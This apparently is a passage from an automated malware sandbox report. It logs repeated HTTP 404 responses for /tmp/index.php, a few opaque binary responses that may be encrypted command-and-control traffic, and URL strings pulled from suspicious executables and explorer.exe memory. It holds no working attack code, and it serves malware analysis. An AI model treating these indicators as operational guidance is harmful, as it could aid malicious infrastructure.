75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1e 7a 47 f0 39 18 f2 f9 09 fc 8c e5 e5 14 99 3b df e9 20 42 18 c2 8f 97 cb Data Ascii: #\6zG9; B
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 5b 3b 08 ad 61 44 a2 ac 09 a2 c8 b0 e5 31 91 3a c0 e8 6d 5f 0d 89 Data Ascii: #\([;aD1:m_
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:45:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0d 63 54 f1 35 0b f5 fd 09 fc 8c e5 e5 00 9d 3c d2 fd 6d 5f 0d 89 Data Ascii: #\6cT5<m_
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Dec 2024 18:46:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: A723.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
        Source: explorer.exe, 00000001.00000000.1714985098.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: A723.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
        Source: A723.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
        Source: A723.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
        Source: Bookings.7.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
        Source: Bookings.7.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: Bookings.7.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: Bookings.7.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
        Source: A723.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: explorer.exe, 00000001.00000000.1714985098.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: A723.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
        Source: A723.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
        Source: A723.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
        Source: explorer.exe, 00000001.00000000.1714985098.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1713516731.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: A723.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
        Source: 3E6C.exe, 0000000C.00000000.3893775169.0000000000A42000.00000002.00000001.01000000.00000008.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, Result.exe.12.dr, 3E6C.exe.1.drString found in binary or memory: http://james.newtonking.com/projects/json
